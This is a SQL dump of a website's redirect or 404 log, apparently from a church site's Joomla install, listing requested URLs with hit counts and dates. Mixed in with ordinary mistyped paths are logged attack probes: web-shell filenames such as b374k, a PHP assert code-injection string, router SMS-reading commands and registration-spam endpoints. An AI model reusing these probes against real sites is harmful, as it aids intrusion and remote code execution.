(5279, 'http://www.lifeoasisinternationalchurch.org/pastoraltraining', NULL, '', '', 1, 0, '2017-05-26 21:31:55', '0000-00-00 00:00:00', 301),
(5280, 'http://www.lifeoasisinternationalchurch.org/pastoral training', NULL, '', '', 1, 0, '2017-05-26 21:50:18', '0000-00-00 00:00:00', 301),
(5281, 'http://www.lifeoasisinternationalchurch.org/traning', NULL, '', '', 1, 0, '2017-05-26 21:50:40', '0000-00-00 00:00:00', 301),
(5282, 'http://www.lifeoasisinternationalchurch.org/private - stream in g', NULL, '', '', 2, 0, '2017-05-26 22:02:47', '0000-00-00 00:00:00', 301),
(5283, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 2, 0, '2017-05-27 03:34:08', '0000-00-00 00:00:00', 301),
(5284, 'http://lifeoasisinternationalchurch.org/pols.php', NULL, '', '', 1, 0, '2017-05-27 04:31:24', '0000-00-00 00:00:00', 301),
(5285, 'http://lifeoasisinternationalchurch.org/upgrade.php', NULL, '', '', 1, 0, '2017-05-27 13:03:14', '0000-00-00 00:00:00', 301),
(5286, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495897072916', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 14:57:50', '0000-00-00 00:00:00', 301),
(5287, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495897268458', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:01:04', '0000-00-00 00:00:00', 301),
(5288, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?multi_data=1&istest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=modem_main_state,pin_status,loginfo,new_version_state,current_upgrade_state,is_mandatory,signalbar,network_type,network_provider,ppp_status,ex_ssid1,sta_ip_status,ex_wifi_profile,m_ssid_enable,radiooff,simcard_roam,lan_ipaddr,station_mac,battery_charging,battery_vol_percent,battery_pers,spn_display_flag,plmn_display_flag,spn_name_data,spn_b1_flag,spn_b2_flag,realtime_tx_bytes,realtime_rx_bytes,realtime_time,realtime_tx_thrpt,realtime_rx_thrpt,monthly_rx_bytes,monthly_tx_bytes,monthly_time,date_month,data_volume_limit_switch,data_volume_limit_size,data_volume_alert_percent,data_volume_limit_unit,roam_setting_option,upg_roam_switch,ap_station_mode,sms_received_flag,sts_received_flag,sms_unread_num&_=1495897268460', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:01:04', '0000-00-00 00:00:00', 301),
(5289, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495897378775', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:02:55', '0000-00-00 00:00:00', 301),
(5290, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?multi_data=1&istest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=modem_main_state,pin_status,loginfo,new_version_state,current_upgrade_state,is_mandatory,signalbar,network_type,network_provider,ppp_status,ex_ssid1,sta_ip_status,ex_wifi_profile,m_ssid_enable,radiooff,simcard_roam,lan_ipaddr,station_mac,battery_charging,battery_vol_percent,battery_pers,spn_display_flag,plmn_display_flag,spn_name_data,spn_b1_flag,spn_b2_flag,realtime_tx_bytes,realtime_rx_bytes,realtime_time,realtime_tx_thrpt,realtime_rx_thrpt,monthly_rx_bytes,monthly_tx_bytes,monthly_time,date_month,data_volume_limit_switch,data_volume_limit_size,data_volume_alert_percent,data_volume_limit_unit,roam_setting_option,upg_roam_switch,ap_station_mode,sms_received_flag,sts_received_flag,sms_unread_num&_=1495897378780', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:02:55', '0000-00-00 00:00:00', 301),
(5291, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495897623399', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:06:59', '0000-00-00 00:00:00', 301),
(5292, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495897623403', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:06:59', '0000-00-00 00:00:00', 301),
(5293, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495897774361', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:09:31', '0000-00-00 00:00:00', 301),
(5294, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495897774362', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:09:31', '0000-00-00 00:00:00', 301),
(5295, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495898041872', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:13:57', '0000-00-00 00:00:00', 301),
(5296, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?multi_data=1&istest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=modem_main_state,pin_status,loginfo,new_version_state,current_upgrade_state,is_mandatory,signalbar,network_type,network_provider,ppp_status,ex_ssid1,sta_ip_status,ex_wifi_profile,m_ssid_enable,radiooff,simcard_roam,lan_ipaddr,station_mac,battery_charging,battery_vol_percent,battery_pers,spn_display_flag,plmn_display_flag,spn_name_data,spn_b1_flag,spn_b2_flag,realtime_tx_bytes,realtime_rx_bytes,realtime_time,realtime_tx_thrpt,realtime_rx_thrpt,monthly_rx_bytes,monthly_tx_bytes,monthly_time,date_month,data_volume_limit_switch,data_volume_limit_size,data_volume_alert_percent,data_volume_limit_unit,roam_setting_option,upg_roam_switch,ap_station_mode,sms_received_flag,sts_received_flag,sms_unread_num&_=1495898041875', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:13:57', '0000-00-00 00:00:00', 301),
(5297, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495898296496', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:13', '0000-00-00 00:00:00', 301),
(5298, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495898296494', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:13', '0000-00-00 00:00:00', 301),
(5299, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=upgrade_result&_=1495898296498', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:13', '0000-00-00 00:00:00', 301),
(5300, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495898340034', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:55', '0000-00-00 00:00:00', 301),
(5301, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?multi_data=1&istest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=modem_main_state,pin_status,loginfo,new_version_state,current_upgrade_state,is_mandatory,signalbar,network_type,network_provider,ppp_status,ex_ssid1,sta_ip_status,ex_wifi_profile,m_ssid_enable,radiooff,simcard_roam,lan_ipaddr,station_mac,battery_charging,battery_vol_percent,battery_pers,spn_display_flag,plmn_display_flag,spn_name_data,spn_b1_flag,spn_b2_flag,realtime_tx_bytes,realtime_rx_bytes,realtime_time,realtime_tx_thrpt,realtime_rx_thrpt,monthly_rx_bytes,monthly_tx_bytes,monthly_time,date_month,data_volume_limit_switch,data_volume_limit_size,data_volume_alert_percent,data_volume_limit_unit,roam_setting_option,upg_roam_switch,ap_station_mode,sms_received_flag,sts_received_flag,sms_unread_num&_=1495898340037', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:56', '0000-00-00 00:00:00', 301),
(5302, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_data_total&page=0&data_per_page=500&mem_store=1&tags=10&order_by=order+by+id+desc&_=1495898340035', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:18:56', '0000-00-00 00:00:00', 301),
(5303, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=sms_capacity_info&_=1495898581405', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:22:58', '0000-00-00 00:00:00', 301),
(5304, 'http://www.lifeoasisinternationalchurch.org/goform/goform_get_cmd_process?istest=false&cmd=upgrade_result&_=1495898581408', NULL, 'http://www.lifeoasisinternationalchurch.org/index.html', '', 1, 0, '2017-05-27 15:22:58', '0000-00-00 00:00:00', 301),
(5305, 'http://www.lifeoasisinternationalchurch.org/admin/login.php', NULL, '', '', 1, 0, '2017-05-27 19:14:34', '0000-00-00 00:00:00', 301),
(5306, 'http://www.lifeoasisinternationalchurch.org/admin/', NULL, '', '', 1, 0, '2017-05-27 19:14:36', '0000-00-00 00:00:00', 301),
(5307, 'http://www.lifeoasisinternationalchurch.org/user/', NULL, '', '', 7, 0, '2017-05-27 19:14:40', '0000-00-00 00:00:00', 301),
(5308, 'http://lifeoasisinternationalchurch.org/loic/articles.php', NULL, '', '', 1, 0, '2017-05-28 01:22:56', '0000-00-00 00:00:00', 301),
(5309, 'http://www.lifeoasisinternationalchurch.org/digital/tv/streaming', NULL, '', '', 2, 0, '2017-05-28 06:46:48', '0000-00-00 00:00:00', 301),
(5310, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1495954744712', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-05-28 06:59:03', '0000-00-00 00:00:00', 301),
(5311, 'http://www.lifeoasisinternationalchurch.org/streamimg', NULL, '', '', 1, 0, '2017-05-28 07:17:31', '0000-00-00 00:00:00', 301),
(5312, 'http://lifeoasisinternationalchurch.org/straeming', NULL, '', '', 1, 0, '2017-05-28 08:24:26', '0000-00-00 00:00:00', 301),
(5313, 'http://www.lifeoasisinternationalchurch.org/digital/tvstreaming', NULL, '', '', 1, 0, '2017-05-28 09:45:17', '0000-00-00 00:00:00', 301),
(5314, 'http://lifeoasisinternationalchurch.org/digital', NULL, '', '', 1, 0, '2017-05-28 09:47:15', '0000-00-00 00:00:00', 301),
(5315, 'https://www.lifeoasisinternationalchurch.org/digital/streaming', NULL, '', '', 2, 0, '2017-05-28 11:38:51', '0000-00-00 00:00:00', 301),
(5316, 'https://www.lifeoasisinternationalchurch.org/digital/tv streaming', NULL, '', '', 1, 0, '2017-05-28 11:42:02', '0000-00-00 00:00:00', 301),
(5317, 'https://www.lifeoasisinternationalchurch.org/digital/treaming', NULL, '', '', 1, 0, '2017-05-28 11:45:45', '0000-00-00 00:00:00', 301),
(5318, 'https://www.lifeoasisinternationalchurch.org/digital/streamingtv', NULL, '', '', 1, 0, '2017-05-28 11:46:11', '0000-00-00 00:00:00', 301),
(5319, 'https://www.lifeoasisinternationalchurch.org/digital/stream', NULL, '', '', 1, 0, '2017-05-28 11:46:41', '0000-00-00 00:00:00', 301),
(5320, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=48:wimmp&catid=18:loic&itemid=239', NULL, '', '', 1, 0, '2017-05-28 12:11:38', '0000-00-00 00:00:00', 301),
(5321, 'http://www.lifeoasisinternationalchurch.org/component/', NULL, '', '', 2, 0, '2017-05-28 15:40:22', '0000-00-00 00:00:00', 301),
(5322, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_user&task=register', NULL, '', '', 1, 0, '2017-05-28 15:40:24', '0000-00-00 00:00:00', 301),
(5323, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-28 15:40:27', '0000-00-00 00:00:00', 301),
(5324, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-28 15:40:27', '0000-00-00 00:00:00', 301),
(5325, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_community&view=register', NULL, '', '', 1, 0, '2017-05-28 15:40:28', '0000-00-00 00:00:00', 301),
(5326, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_secureregistration&task=register', NULL, '', '', 1, 0, '2017-05-28 15:40:37', '0000-00-00 00:00:00', 301),
(5327, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_registration&task=register', NULL, '', '', 1, 0, '2017-05-28 15:40:40', '0000-00-00 00:00:00', 301),
(5328, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_comprofiler&task=registers', NULL, '', '', 2, 0, '2017-05-28 15:40:41', '0000-00-00 00:00:00', 301),
(5329, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_joocm&view=register', NULL, '', '', 1, 0, '2017-05-28 15:40:42', '0000-00-00 00:00:00', 301),
(5330, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_easysocial&view=registration', NULL, '', '', 2, 0, '2017-05-28 15:40:43', '0000-00-00 00:00:00', 301),
(5331, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/index.php?option=com_user&view=register', NULL, '', '', 1, 0, '2017-05-28 15:40:46', '0000-00-00 00:00:00', 301),
(5332, 'https://www.lifeoasisinternationalchurch.org/resources/broadcast-schedul', NULL, '', '', 1, 0, '2017-05-28 17:27:26', '0000-00-00 00:00:00', 301),
(5333, 'http://lifeoasisinternationalchurch.org/assets/b374k-2.8.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-05-28 19:34:53', '0000-00-00 00:00:00', 301),
(5334, 'http://lifeoasisinternationalchurch.org/temp.php', NULL, '', '', 3, 0, '2017-05-29 01:48:16', '0000-00-00 00:00:00', 301),
(5335, 'http://www.lifeoasisinternationalchurch.org/resources/french/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-05-30 00:14:04', '0000-00-00 00:00:00', 301),
(5336, 'http://lifeoasisinternationalchurch.org/whatsapp', NULL, '', '', 2, 0, '2017-05-30 05:28:38', '0000-00-00 00:00:00', 301),
(5337, 'http://lifeoasisinternationalchurch.org/join.php', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3, 0, '2017-05-30 08:45:18', '0000-00-00 00:00:00', 301),
(5338, 'http://lifeoasisinternationalchurch.org/users.php?mode=new', NULL, 'http://lifeoasisinternationalchurch.org/', '', 3, 0, '2017-05-30 08:45:20', '0000-00-00 00:00:00', 301),
(5339, 'http://lifeoasisinternationalchurch.org/index.php', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&task=register', '', 9162, 0, '2017-05-30 08:45:23', '0000-00-00 00:00:00', 301),
(5340, 'http://www.lifeoasisinternationalchurch.org/images/books', NULL, '', '', 2, 0, '2017-05-30 12:10:20', '0000-00-00 00:00:00', 301),
(5341, 'http://www.lifeoasisinternationalchurch.org/test-for-404-page', NULL, '', '', 1, 0, '2017-05-30 13:30:02', '0000-00-00 00:00:00', 301),
(5342, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_user&task=register', NULL, '', '', 1, 0, '2017-05-30 15:52:33', '0000-00-00 00:00:00', 301),
(5343, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/joomla/other-components/registration-form', NULL, '', '', 1, 0, '2017-05-30 15:52:36', '0000-00-00 00:00:00', 301),
(5344, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-30 15:52:37', '0000-00-00 00:00:00', 301),
(5345, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-05-30 15:52:37', '0000-00-00 00:00:00', 301),
(5346, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_community&view=register', NULL, '', '', 1, 0, '2017-05-30 15:52:38', '0000-00-00 00:00:00', 301),
(5347, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/component/user/register.html', NULL, '', '', 1, 0, '2017-05-30 15:52:39', '0000-00-00 00:00:00', 301),
(5348, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/registration/registers', NULL, '', '', 1, 0, '2017-05-30 15:52:40', '0000-00-00 00:00:00', 301),
(5349, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/registratsiya/registers', NULL, '', '', 1, 0, '2017-05-30 15:52:40', '0000-00-00 00:00:00', 301),
(5350, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/component/comprofiler/registers.html', NULL, '', '', 1, 0, '2017-05-30 15:52:41', '0000-00-00 00:00:00', 301),
(5351, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/user/registration', NULL, '', '', 1, 0, '2017-05-30 15:52:42', '0000-00-00 00:00:00', 301),
(5352, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_secureregistration&task=register', NULL, '', '', 1, 0, '2017-05-30 15:52:43', '0000-00-00 00:00:00', 301),
(5353, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/component/option,com_comprofiler/task,registers/', NULL, '', '', 1, 0, '2017-05-30 15:52:44', '0000-00-00 00:00:00', 301),
(5354, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_registration&task=register', NULL, '', '', 1, 0, '2017-05-30 15:52:45', '0000-00-00 00:00:00', 301),
(5355, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_comprofiler&task=registers', NULL, '', '', 1, 0, '2017-05-30 15:52:46', '0000-00-00 00:00:00', 301),
(5356, 'http://lifeoasisinternationalchurch.org/error-logs.php', NULL, '', '', 1, 0, '2017-05-30 22:05:32', '0000-00-00 00:00:00', 301),
(5357, 'http://www.lifeoasisinternationalchurch.org//index.php/component/user/?task=register', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 1, 0, '2017-05-31 10:58:25', '0000-00-00 00:00:00', 301),
(5358, 'http://www.lifeoasisinternationalchurch.org//component/user/?task=register', NULL, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=login&Itemid=101', '', 1, 0, '2017-05-31 10:58:29', '0000-00-00 00:00:00', 301),
(5359, 'http://www.lifeoasisinternationalchurch.org//option=com_user?view=register', NULL, 'https://www.lifeoasisinternationalchurch.org/component/user/?task=register', '', 1, 0, '2017-05-31 10:58:31', '0000-00-00 00:00:00', 301),
(5360, 'http://lifeoasisinternationalchurch.org/reade.php', NULL, '', '', 1, 0, '2017-05-31 20:14:57', '0000-00-00 00:00:00', 301),
(5361, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy', NULL, '', '', 4, 0, '2017-05-31 21:18:40', '0000-00-00 00:00:00', 301),
(5362, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last', NULL, '', '', 4, 0, '2017-05-31 21:18:40', '0000-00-00 00:00:00', 301),
(5363, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct', NULL, '', '', 4, 0, '2017-05-31 21:18:40', '0000-00-00 00:00:00', 301),
(5364, 'http://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnant', NULL, '', '', 4, 0, '2017-05-31 21:18:41', '0000-00-00 00:00:00', 301),
(5365, 'http://lifeoasisinternationalchurch.org/media/media.php?1=assert&2=die(pi()*42);', NULL, '', '', 2, 0, '2017-06-01 03:24:44', '0000-00-00 00:00:00', 301),
(5366, 'http://www.lifeoasisinternationalchurch.org/magazine', NULL, '', '', 1, 0, '2017-06-01 03:53:17', '0000-00-00 00:00:00', 301),
(5367, 'http://lifeoasisinternationalchurch.org/versions.php', NULL, '', '', 1, 0, '2017-06-01 04:05:16', '0000-00-00 00:00:00', 301),
(5368, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/11-about-joomla', NULL, '', '', 2, 0, '2017-06-01 07:55:54', '0000-00-00 00:00:00', 301),
(5369, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/5-menu-options', NULL, '', '', 2, 0, '2017-06-01 07:56:00', '0000-00-00 00:00:00', 301),
(5370, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58', NULL, '', '', 1, 0, '2017-06-01 10:09:37', '0000-00-00 00:00:00', 301),
(5371, 'http://www.lifeoasisinternationalchurch.org/images/books/breaking', NULL, '', '', 2, 0, '2017-06-01 11:12:03', '0000-00-00 00:00:00', 301),
(5372, 'http://lifeoasisinternationalchurch.org/axmlprc.php', NULL, '', '', 1, 0, '2017-06-01 15:16:49', '0000-00-00 00:00:00', 301),
(5373, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1496333541278', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-06-01 16:12:20', '0000-00-00 00:00:00', 301),
(5374, 'http://www.lifeoasisinternationalchurch.org/images/loic/asom', NULL, '', '', 2, 0, '2017-06-01 16:53:30', '0000-00-00 00:00:00', 301),
(5375, 'http://www.lifeoasisinternationalchurch.org/images/books/the', NULL, '', '', 2, 0, '2017-06-01 22:43:11', '0000-00-00 00:00:00', 301),
(5376, 'http://lifeoasisinternationalchurch.org/wp-pols.php', NULL, '', '', 1, 0, '2017-06-01 22:49:16', '0000-00-00 00:00:00', 301),
(5377, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 2, 0, '2017-06-02 00:04:46', '0000-00-00 00:00:00', 301),
(5378, 'https://lifeoasisinternationalchurch.org/core', NULL, '', '', 1, 0, '2017-06-02 03:41:26', '0000-00-00 00:00:00', 301),
(5379, 'https://www.lifeoasisinternationalchurch.org/core', NULL, '', '', 1, 0, '2017-06-02 03:41:27', '0000-00-00 00:00:00', 301),
(5380, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 5, 0, '2017-06-02 04:19:47', '0000-00-00 00:00:00', 301),
(5381, 'http://lifeoasisinternationalchurch.org/wp-conde.php', NULL, '', '', 1, 0, '2017-06-02 07:11:53', '0000-00-00 00:00:00', 301),
(5382, 'http://www.lifeoasisinternationalchurch.org/template-info/gin/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-06-02 13:16:44', '0000-00-00 00:00:00', 301),
(5383, 'https://lifeoasisinternationalchurch.org/resources/blog/item/scriptural prayers for your husband_files/0', NULL, '', '', 1, 0, '2017-06-02 20:58:39', '0000-00-00 00:00:00', 301),
(5384, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming private', NULL, '', '', 1, 0, '2017-06-02 21:40:45', '0000-00-00 00:00:00', 301),
(5385, 'http://lifeoasisinternationalchurch.org/prstreaming', NULL, '', '', 1, 0, '2017-06-02 21:49:45', '0000-00-00 00:00:00', 301),
(5386, 'http://lifeoasisinternationalchurch.org/pastor', NULL, '', '', 1, 0, '2017-06-02 21:57:58', '0000-00-00 00:00:00', 301),
(5387, 'http://www.lifeoasisinternationalchurch.org/resources/training', NULL, '', '', 3, 0, '2017-06-03 10:31:56', '0000-00-00 00:00:00', 301),
(5388, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/34-wife-of-ministers-of-the-gospel-outline', NULL, '', '', 20, 0, '2017-06-03 15:45:45', '0000-00-00 00:00:00', 301),
(5389, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/44-daughters-of-destiny', NULL, '', '', 19, 0, '2017-06-03 15:57:12', '0000-00-00 00:00:00', 301),
(5390, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 3, 0, '2017-06-04 08:00:55', '0000-00-00 00:00:00', 301),
(5391, 'http://lifeoasisinternationalchurch.org/taining', NULL, '', '', 2, 0, '2017-06-04 15:47:15', '0000-00-00 00:00:00', 301),
(5392, 'https://lifeoasisinternationalchurch.org/index.php/tutorials/rev-mrs-oyenike-areogun', NULL, '', '', 18, 0, '2017-06-05 02:58:51', '0000-00-00 00:00:00', 301),
(5393, 'http://lifeoasisinternationalchurch.org/ministries/outreah', NULL, '', '', 1, 0, '2017-06-05 04:15:53', '0000-00-00 00:00:00', 301),
(5394, 'http://lifeoasisinternationalchurch.org/resources/daily-bible-reading', NULL, '', '', 1, 0, '2017-06-05 04:17:20', '0000-00-00 00:00:00', 301),
(5395, 'https://lifeoasisinternationalchurch.org/index.php/partnership1', NULL, '', '', 19, 0, '2017-06-05 13:45:56', '0000-00-00 00:00:00', 301),
(5396, 'http://lifeoasisinternationalchurch.org/index.php/component/users/?view=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php/component/users/?view=register', '', 8, 0, '2017-06-05 19:37:05', '0000-00-00 00:00:00', 301),
(5397, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_users&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_users&view=register', '', 8, 0, '2017-06-05 19:51:43', '0000-00-00 00:00:00', 301),
(5398, 'http://www.lifeoasisinternationalchurch.org/index.php/user/?view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/user/?view=registration', '', 9, 0, '2017-06-05 22:17:25', '0000-00-00 00:00:00', 301),
(5399, 'http://lifeoasisinternationalchurch.org/index.php/user/?view=registration', NULL, 'http://lifeoasisinternationalchurch.org/index.php/user/?view=registration', '', 9, 0, '2017-06-05 22:17:26', '0000-00-00 00:00:00', 301),
(5400, 'http://lifeoasisinternationalchurch.org/cache.php', NULL, 'http://www.googlebot.com/bot.html', '', 4, 0, '2017-06-06 00:09:37', '0000-00-00 00:00:00', 301),
(5401, 'https://www.vfortuness.com/login.php', NULL, '', '', 2, 0, '2017-06-06 06:10:54', '0000-00-00 00:00:00', 301),
(5402, 'http://lifeoasisinternationalchurch.org/loic/tracts.php', NULL, '', '', 1, 0, '2017-06-06 10:54:46', '0000-00-00 00:00:00', 301),
(5403, 'http://lifeoasisinternationalchurch.org/images/asom2014.pdf', NULL, '', '', 2, 0, '2017-06-06 13:56:54', '0000-00-00 00:00:00', 301),
(5404, 'http://www.lifeoasisinternationalchurch.org/images/books/unmasking', NULL, '', '', 2, 0, '2017-06-06 13:56:54', '0000-00-00 00:00:00', 301),
(5405, 'http://lifeoasisinternationalchurch.org/accomodation.pdf', NULL, 'http://dc.lifeoasisinternationalchurch.org/', '', 10, 0, '2017-06-06 14:39:47', '0000-00-00 00:00:00', 301),
(5406, 'http://lifeoasisinternationalchurch.org/random.php', NULL, '', '', 1, 0, '2017-06-06 14:41:27', '0000-00-00 00:00:00', 301),
(5407, 'http://www.lifeoasisinternationalchurch.org/gobc2017', NULL, 'https://www.google.com.ng/', '', 83, 0, '2017-06-06 15:29:23', '0000-00-00 00:00:00', 301),
(5408, 'http://lifeoasisinternationalchurch.org/gobc2017', NULL, 'http://lifeoasisinternationalchurch.org/', '', 129, 0, '2017-06-06 16:22:42', '0000-00-00 00:00:00', 301),
(5409, 'http://www.lifeoasisinternationalchurch.org/feedback.html', NULL, '', '', 1, 0, '2017-06-06 20:54:16', '0000-00-00 00:00:00', 301),
(5410, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=registration', '', 9, 0, '2017-06-06 20:59:35', '0000-00-00 00:00:00', 301),
(5411, 'http://lifeoasisinternationalchurch.org/cod.php', NULL, '', '', 1, 0, '2017-06-06 21:59:12', '0000-00-00 00:00:00', 301),
(5412, 'http://www.lifeoasisinternationalchurch.org/)', NULL, '', '', 1, 0, '2017-06-06 22:55:19', '0000-00-00 00:00:00', 301),
